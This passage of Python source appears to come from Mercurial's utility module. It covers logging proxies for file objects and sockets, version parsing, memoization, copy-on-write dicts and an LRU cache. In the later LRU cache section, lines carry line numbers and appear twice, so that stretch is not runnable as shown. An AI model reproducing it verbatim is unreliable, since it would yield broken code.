            r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'detach', *args, **kwargs)

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read1', *args, **kwargs)

class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _fillbuffer(self):
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        fn = getattr(self._input._observer, r'osread', None)
        if fn:
            fn(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, r'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, r'bufferedreadline', None)
        if fn:
            fn(res)

        return res

PROXIED_SOCKET_METHODS = {
    r'makefile',
    r'recv',
    r'recvfrom',
    r'recvfrom_into',
    r'recv_into',
    r'send',
    r'sendall',
    r'sendto',
    r'setblocking',
    r'settimeout',
    r'gettimeout',
    r'setsockopt',
}

class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, sock, observer):
        object.__setattr__(self, r'_orig', sock)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, r'_observedcall')(
            r'makefile', *args, **kwargs)

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, r'_observer')
        return makeloggingfileobject(observer.fh, res, observer.name,
                                     reads=observer.reads,
                                     writes=observer.writes,
                                     logdata=observer.logdata,
                                     logdataapis=observer.logdataapis)

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv', *args, **kwargs)

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom', *args, **kwargs)

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom_into', *args, **kwargs)

    def recv_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv_into', *args, **kwargs)

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'send', *args, **kwargs)

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendall', *args, **kwargs)

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendto', *args, **kwargs)

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setblocking', *args, **kwargs)

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'settimeout', *args, **kwargs)

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'gettimeout', *args, **kwargs)

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setsockopt', *args, **kwargs)

class baseproxyobserver(object):
    def _writedata(self, data):
        if not self.logdata:
            if self.logdataapis:
                self.fh.write('\n')
                self.fh.flush()
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            if self.logdataapis:
                self.fh.write(': %s\n' % stringutil.escapestr(data))
            else:
                self.fh.write('%s> %s\n'
                              % (self.name, stringutil.escapestr(data)))
            self.fh.flush()
            return

        # Data with newlines is written to multiple lines.
        if self.logdataapis:
            self.fh.write(':\n')

        lines = data.splitlines(True)
        for line in lines:
            self.fh.write('%s> %s\n'
                          % (self.name, stringutil.escapestr(line)))
        self.fh.flush()

class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False,
                 logdataapis=True):
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.logdataapis = logdataapis
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        if size == -1 and res == '':
            # Suppress pointless read(-1) calls that return
            # nothing. These happen _a lot_ on Python 3, and there
            # doesn't seem to be a better workaround to have matching
            # Python 2 and 3 behavior. :(
            return

        if self.logdataapis:
            self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                      res))

        data = dest[0:res] if res is not None else b''

        # _writedata() uses "in" operator and is confused by memoryview because
        # characters are ints on Python 3.
        if isinstance(data, memoryview):
            data = data.tobytes()

        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedread(%d) -> %d' % (
                self.name, size, len(res)))

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedreadline() -> %d' % (
                self.name, len(res)))

        self._writedata(res)

def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False, logdataapis=True):
    """Turn a file object into a logging file object."""

    observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
                                  logdata=logdata, logdataapis=logdataapis)
    return fileobjectproxy(fh, observer)

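# Illustrative usage sketch (ours): mirror every I/O call on a file object to
# a log handle. The names 'logfh', 'datafh' and 'data' are hypothetical.
def _demologgingfileobject(logfh, datafh):
    proxy = makeloggingfileobject(logfh, datafh, 'data', logdata=True)
    proxy.write(b'hello\n')  # logs roughly "data> write(6) -> 6: hello\\n"
    proxy.flush()            # logs "data> flush() -> None"
    return proxy
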
class socketobserver(baseproxyobserver):
    """Logs socket activity."""
    def __init__(self, fh, name, reads=True, writes=True, states=True,
                 logdata=False, logdataapis=True):
        self.fh = fh
        self.name = name
        self.reads = reads
        self.writes = writes
        self.states = states
        self.logdata = logdata
        self.logdataapis = logdataapis

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write('%s> makefile(%r, %r)\n' % (
            self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv(%d, %d) -> %d' % (
                self.name, size, flags, len(res)))
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
                self.name, size, flags, len(res[0])))

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
                self.name, size, flags, res[0]))

        self._writedata(buf[0:res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv_into(%d, %d) -> %d' % (
                self.name, size, flags, res))

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # send() returns the number of bytes written, so report 'res'
            # directly rather than calling len() on an integer.
            self.fh.write('%s> send(%d, %d) -> %d' % (
                self.name, len(data), flags, res))
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write('%s> sendall(%d, %d)' % (
                self.name, len(data), flags))

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
                self.name, len(data), flags, address, res))

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write('%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
            self.name, level, optname, value, res))

def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
                      logdata=False, logdataapis=True):
    """Turn a socket into a logging socket."""

    observer = socketobserver(logh, name, reads=reads, writes=writes,
                              states=states, logdata=logdata,
                              logdataapis=logdataapis)
    return socketproxy(fh, observer)

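# Illustrative usage sketch (ours): observe socket traffic during a test. The
# socket and its peer are hypothetical.
def _demologgingsocket(logfh, sock):
    proxy = makeloggingsocket(logfh, sock, 'client', logdata=True)
    proxy.sendall(b'ping')  # logs roughly "client> sendall(4, 0): ping"
    return proxy.recv(64)   # logs the received payload the same way
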
def version():
    """Return version information if available."""
    try:
        from . import __version__
        return __version__.version
    except ImportError:
        return 'unknown'

def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')

    >>> versiontuple(b'4.6rc0')
    (4, 6, None, 'rc0')
    >>> versiontuple(b'4.6rc0+12-425d55e54f98')
    (4, 6, None, 'rc0+12-425d55e54f98')
    >>> versiontuple(b'.1.2.3')
    (None, None, None, '.1.2.3')
    >>> versiontuple(b'12.34..5')
    (12, 34, None, '..5')
    >>> versiontuple(b'1.2.3.4.5.6')
    (1, 2, 3, '.4.5.6')
    """
    if not v:
        v = version()
    m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
    if not m:
        vparts, extra = '', v
    elif m.group(2):
        vparts, extra = m.groups()
    else:
        vparts, extra = m.group(1), None

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)

def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keyword args
    if func.__code__.co_argcount == 0:
        cache = []
        def f():
            if len(cache) == 0:
                cache.append(func())
            return cache[0]
        return f
    cache = {}
    if func.__code__.co_argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f

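# Illustrative usage (ours): cachefunc() memoizes on positional arguments
# only, so it suits pure functions taking hashable inputs.
def _democachefunc():
    calls = []
    def square(x):
        calls.append(x)
        return x * x
    cached = cachefunc(square)
    cached(3)
    cached(3)  # served from the cache; square() is not called again
    return len(calls) == 1
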
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        if getattr(self, '_copied', 0):
            self._copied -= 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self

class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v

class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """

class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """

class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()

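# Illustrative sketch (ours, not upstream): a minimal transactional subclass,
# usable with the 'with' statement via the base class above. It is a
# hypothetical stand-in for a real repository transaction.
class _demotransaction(transactional):
    def __init__(self):
        self.state = 'pending'

    def close(self):
        self.state = 'committed'

    def release(self):
        if self.state != 'committed':
            self.state = 'aborted'

# Leaving the context without an exception commits:
#   with _demotransaction() as tr:
#       ...                      # tr.state == 'committed' afterwards;
#                                # if the body raises, tr.state == 'aborted'
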
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns.
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        tr.close()
        raise
    finally:
        tr.release()

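# Illustrative usage (ours), reusing the _demotransaction sketch above: on
# InterventionRequired the transaction is closed (committed) rather than
# aborted, so the operation can be resumed later.
def _demoacceptintervention():
    tr = _demotransaction()
    try:
        with acceptintervention(tr):
            raise error.InterventionRequired('resolve conflicts and rerun')
    except error.InterventionRequired:
        pass
    return tr.state  # 'committed', not 'aborted'
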
@contextlib.contextmanager
def nullcontextmanager():
    yield

class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (r'next', r'prev', r'key', r'value', r'cost')

    def __init__(self):
        self.next = None
        self.prev = None

        self.key = _notset
        self.value = None
        self.cost = 0

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
        self.value = None
        self.cost = 0

class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.

    Items in the cache can be inserted with an optional "cost" value. This is
    simply an integer that is specified by the caller. The cache can be queried
    for the total cost of all items presently in the cache.

    The cache can also define a maximum cost. If a cache insertion would
    cause the total cost of the cache to go beyond the maximum cost limit,
    nodes will be evicted to make room for the new entry. This can be used
    to e.g. set a max memory limit and associate an estimated bytes size
    cost to each item in the cache. By default, no maximum cost is enforced.
    """
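    # Illustrative usage (ours, not part of the docstring):
    #
    #   d = lrucachedict(4, maxcost=100)
    #   d.insert('a', 'value-a', cost=60)
    #   d.insert('b', 'value-b', cost=60)  # total cost 120 > 100, so the
    #                                      # least recent entry 'a' is evicted
    #   'a' in d   -> False
    #   d['b']     -> 'value-b' (and 'b' becomes the most recent entry)
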
    def __init__(self, max, maxcost=0):
        self._cache = {}

        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self.capacity = max
        self.totalcost = 0
        self.maxcost = maxcost

    def __len__(self):
        return len(self._cache)

1270
1270
1271 def __contains__(self, k):
1271 def __contains__(self, k):
1272 return k in self._cache
1272 return k in self._cache
1273
1273
1274 def __iter__(self):
1274 def __iter__(self):
1275 # We don't have to iterate in cache order, but why not.
1275 # We don't have to iterate in cache order, but why not.
1276 n = self._head
1276 n = self._head
1277 for i in range(len(self._cache)):
1277 for i in range(len(self._cache)):
1278 yield n.key
1278 yield n.key
1279 n = n.next
1279 n = n.next
1280
1280
1281 def __getitem__(self, k):
1281 def __getitem__(self, k):
1282 node = self._cache[k]
1282 node = self._cache[k]
1283 self._movetohead(node)
1283 self._movetohead(node)
1284 return node.value
1284 return node.value
1285
1285
    def insert(self, k, v, cost=0):
        """Insert a new item in the cache with optional cost value."""
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            self.totalcost -= node.cost
            node.value = v
            node.cost = cost
            self.totalcost += cost
            self._movetohead(node)

            if self.maxcost:
                self._enforcecostlimit()

            return

        if self._size < self.capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

        # At capacity. Kill the old entry.
        if node.key is not _notset:
            self.totalcost -= node.cost
            del self._cache[node.key]

        node.key = k
        node.value = v
        node.cost = cost
        self.totalcost += cost
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

        if self.maxcost:
            self._enforcecostlimit()

    def __setitem__(self, k, v):
        self.insert(k, v)

    def __delitem__(self, k):
        self.pop(k)

    def pop(self, k, default=_notset):
        try:
            node = self._cache.pop(k)
        except KeyError:
            if default is _notset:
                raise
            return default
        value = node.value
        self.totalcost -= node.cost
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

        return value

1348
1348
1349 # Additional dict methods.
1349 # Additional dict methods.
1350
1350
1351 def get(self, k, default=None):
1351 def get(self, k, default=None):
1352 try:
1352 try:
1353 return self.__getitem__(k)
1353 return self.__getitem__(k)
1354 except KeyError:
1354 except KeyError:
1355 return default
1355 return default
1356
1356
1357 def peek(self, k, default=_notset):
1357 def peek(self, k, default=_notset):
1358 """Get the specified item without moving it to the head
1358 """Get the specified item without moving it to the head
1359
1359
1360 Unlike get(), this doesn't mutate the internal state. But be aware
1360 Unlike get(), this doesn't mutate the internal state. But be aware
1361 that it doesn't mean peek() is thread safe.
1361 that it doesn't mean peek() is thread safe.
1362 """
1362 """
1363 try:
1363 try:
1364 node = self._cache[k]
1364 node = self._cache[k]
1365 return node.value
1365 return node.value
1366 except KeyError:
1366 except KeyError:
1367 if default is _notset:
1367 if default is _notset:
1368 raise
1368 raise
1369 return default
1369 return default
1370
1370
1371 def clear(self):
1371 def clear(self):
1372 n = self._head
1372 n = self._head
1373 while n.key is not _notset:
1373 while n.key is not _notset:
1374 self.totalcost -= n.cost
1374 self.totalcost -= n.cost
1375 n.markempty()
1375 n.markempty()
1376 n = n.next
1376 n = n.next
1377
1377
1378 self._cache.clear()
1378 self._cache.clear()
1379
1379
1380 def copy(self, capacity=None, maxcost=0):
1380 def copy(self, capacity=None, maxcost=0):
1381 """Create a new cache as a copy of the current one.
1381 """Create a new cache as a copy of the current one.
1382
1382
1383 By default, the new cache has the same capacity as the existing one.
1383 By default, the new cache has the same capacity as the existing one.
1384 But, the cache capacity can be changed as part of performing the
1384 But, the cache capacity can be changed as part of performing the
1385 copy.
1385 copy.
1386
1386
1387 Items in the copy have an insertion/access order matching this
1387 Items in the copy have an insertion/access order matching this
1388 instance.
1388 instance.
1389 """
1389 """
1390
1390
1391 capacity = capacity or self.capacity
1391 capacity = capacity or self.capacity
1392 maxcost = maxcost or self.maxcost
1392 maxcost = maxcost or self.maxcost
1393 result = lrucachedict(capacity, maxcost=maxcost)
1393 result = lrucachedict(capacity, maxcost=maxcost)
1394
1394
1395 # We copy entries by iterating in oldest-to-newest order so the copy
1395 # We copy entries by iterating in oldest-to-newest order so the copy
1396 # has the correct ordering.
1396 # has the correct ordering.
1397
1397
1398 # Find the first non-empty entry.
1398 # Find the first non-empty entry.
1399 n = self._head.prev
1399 n = self._head.prev
1400 while n.key is _notset and n is not self._head:
1400 while n.key is _notset and n is not self._head:
1401 n = n.prev
1401 n = n.prev
1402
1402
1403 # We could potentially skip the first N items when decreasing capacity.
1403 # We could potentially skip the first N items when decreasing capacity.
1404 # But let's keep it simple unless it is a performance problem.
1404 # But let's keep it simple unless it is a performance problem.
1405 for i in range(len(self._cache)):
1405 for i in range(len(self._cache)):
1406 result.insert(n.key, n.value, cost=n.cost)
1406 result.insert(n.key, n.value, cost=n.cost)
1407 n = n.prev
1407 n = n.prev
1408
1408
1409 return result
1409 return result
1410
1410
1411 def popoldest(self):
1411 def popoldest(self):
1412 """Remove the oldest item from the cache.
1412 """Remove the oldest item from the cache.
1413
1413
1414 Returns the (key, value) describing the removed cache entry.
1414 Returns the (key, value) describing the removed cache entry.
1415 """
1415 """
1416 if not self._cache:
1416 if not self._cache:
1417 return
1417 return
1418
1418
1419 # Walk the linked list backwards starting at tail node until we hit
1419 # Walk the linked list backwards starting at tail node until we hit
1420 # a non-empty node.
1420 # a non-empty node.
1421 n = self._head.prev
1421 n = self._head.prev
1422 while n.key is _notset:
1422 while n.key is _notset:
1423 n = n.prev
1423 n = n.prev
1424
1424
1425 key, value = n.key, n.value
1425 key, value = n.key, n.value
1426
1426
1427 # And remove it from the cache and mark it as empty.
1427 # And remove it from the cache and mark it as empty.
1428 del self._cache[n.key]
1428 del self._cache[n.key]
1429 self.totalcost -= n.cost
1429 self.totalcost -= n.cost
1430 n.markempty()
1430 n.markempty()
1431
1431
1432 return key, value
1432 return key, value
1433
1433
1434 def _movetohead(self, node):
1434 def _movetohead(self, node):
1435 """Mark a node as the newest, making it the new head.
1435 """Mark a node as the newest, making it the new head.
1436
1436
1437 When a node is accessed, it becomes the freshest entry in the LRU
1437 When a node is accessed, it becomes the freshest entry in the LRU
1438 list, which is denoted by self._head.
1438 list, which is denoted by self._head.
1439
1439
1440 Visually, let's make ``N`` the new head node (* denotes head):
1440 Visually, let's make ``N`` the new head node (* denotes head):
1441
1441
1442 previous/oldest <-> head <-> next/next newest
1442 previous/oldest <-> head <-> next/next newest
1443
1443
1444 ----<->--- A* ---<->-----
1444 ----<->--- A* ---<->-----
1445 | |
1445 | |
1446 E <-> D <-> N <-> C <-> B
1446 E <-> D <-> N <-> C <-> B
1447
1447
1448 To:
1448 To:
1449
1449
1450 ----<->--- N* ---<->-----
1450 ----<->--- N* ---<->-----
1451 | |
1451 | |
1452 E <-> D <-> C <-> B <-> A
1452 E <-> D <-> C <-> B <-> A
1453
1453
1454 This requires the following moves:
1454 This requires the following moves:
1455
1455
1456 C.next = D (node.prev.next = node.next)
1456 C.next = D (node.prev.next = node.next)
1457 D.prev = C (node.next.prev = node.prev)
1457 D.prev = C (node.next.prev = node.prev)
1458 E.next = N (head.prev.next = node)
1458 E.next = N (head.prev.next = node)
1459 N.prev = E (node.prev = head.prev)
1459 N.prev = E (node.prev = head.prev)
1460 N.next = A (node.next = head)
1460 N.next = A (node.next = head)
1461 A.prev = N (head.prev = node)
1461 A.prev = N (head.prev = node)
1462 """
1462 """
1463 head = self._head
1463 head = self._head
1464 # C.next = D
1464 # C.next = D
1465 node.prev.next = node.next
1465 node.prev.next = node.next
1466 # D.prev = C
1466 # D.prev = C
1467 node.next.prev = node.prev
1467 node.next.prev = node.prev
1468 # N.prev = E
1468 # N.prev = E
1469 node.prev = head.prev
1469 node.prev = head.prev
1470 # N.next = A
1470 # N.next = A
1471 # It is tempting to do just "head" here, however if node is
1471 # It is tempting to do just "head" here, however if node is
1472 # adjacent to head, this will do bad things.
1472 # adjacent to head, this will do bad things.
1473 node.next = head.prev.next
1473 node.next = head.prev.next
1474 # E.next = N
1474 # E.next = N
1475 node.next.prev = node
1475 node.next.prev = node
1476 # A.prev = N
1476 # A.prev = N
1477 node.prev.next = node
1477 node.prev.next = node
1478
1478
1479 self._head = node
1479 self._head = node
1480
1480
1481 def _addcapacity(self):
1481 def _addcapacity(self):
1482 """Add a node to the circular linked list.
1482 """Add a node to the circular linked list.
1483
1483
1484 The new node is inserted before the head node.
1484 The new node is inserted before the head node.
1485 """
1485 """
1486 head = self._head
1486 head = self._head
1487 node = _lrucachenode()
1487 node = _lrucachenode()
1488 head.prev.next = node
1488 head.prev.next = node
1489 node.prev = head.prev
1489 node.prev = head.prev
1490 node.next = head
1490 node.next = head
1491 head.prev = node
1491 head.prev = node
1492 self._size += 1
1492 self._size += 1
1493 return node
1493 return node
1494
1494
1495 def _enforcecostlimit(self):
1495 def _enforcecostlimit(self):
1496 # This should run after an insertion. It should only be called if total
1496 # This should run after an insertion. It should only be called if total
1497 # cost limits are being enforced.
1497 # cost limits are being enforced.
1498 # The most recently inserted node is never evicted.
1498 # The most recently inserted node is never evicted.
1499 if len(self) <= 1 or self.totalcost <= self.maxcost:
1499 if len(self) <= 1 or self.totalcost <= self.maxcost:
1500 return
1500 return
1501
1501
1502 # This is logically equivalent to calling popoldest() until we
1502 # This is logically equivalent to calling popoldest() until we
1503 # free up enough cost. We don't do that since popoldest() needs
1503 # free up enough cost. We don't do that since popoldest() needs
1504 # to walk the linked list and doing this in a loop would be
1504 # to walk the linked list and doing this in a loop would be
1505 # quadratic. So we find the first non-empty node and then
1505 # quadratic. So we find the first non-empty node and then
1506 # walk nodes until we free up enough capacity.
1506 # walk nodes until we free up enough capacity.
1507 #
1507 #
1508 # If we only removed the minimum number of nodes to free enough
1508 # If we only removed the minimum number of nodes to free enough
1509 # cost at insert time, chances are high that the next insert would
1509 # cost at insert time, chances are high that the next insert would
1510 # also require pruning. This would effectively constitute quadratic
1510 # also require pruning. This would effectively constitute quadratic
1511 # behavior for insert-heavy workloads. To mitigate this, we set a
1511 # behavior for insert-heavy workloads. To mitigate this, we set a
1512 # target cost that is a percentage of the max cost. This will tend
1512 # target cost that is a percentage of the max cost. This will tend
1513 # to free more nodes when the high water mark is reached, which
1513 # to free more nodes when the high water mark is reached, which
1514 # lowers the chances of needing to prune on the subsequent insert.
1514 # lowers the chances of needing to prune on the subsequent insert.
1515 targetcost = int(self.maxcost * 0.75)
1515 targetcost = int(self.maxcost * 0.75)
1516
1516
1517 n = self._head.prev
1517 n = self._head.prev
1518 while n.key is _notset:
1518 while n.key is _notset:
1519 n = n.prev
1519 n = n.prev
1520
1520
1521 while len(self) > 1 and self.totalcost > targetcost:
1521 while len(self) > 1 and self.totalcost > targetcost:
1522 del self._cache[n.key]
1522 del self._cache[n.key]
1523 self.totalcost -= n.cost
1523 self.totalcost -= n.cost
1524 n.markempty()
1524 n.markempty()
1525 n = n.prev
1525 n = n.prev
1526
1526
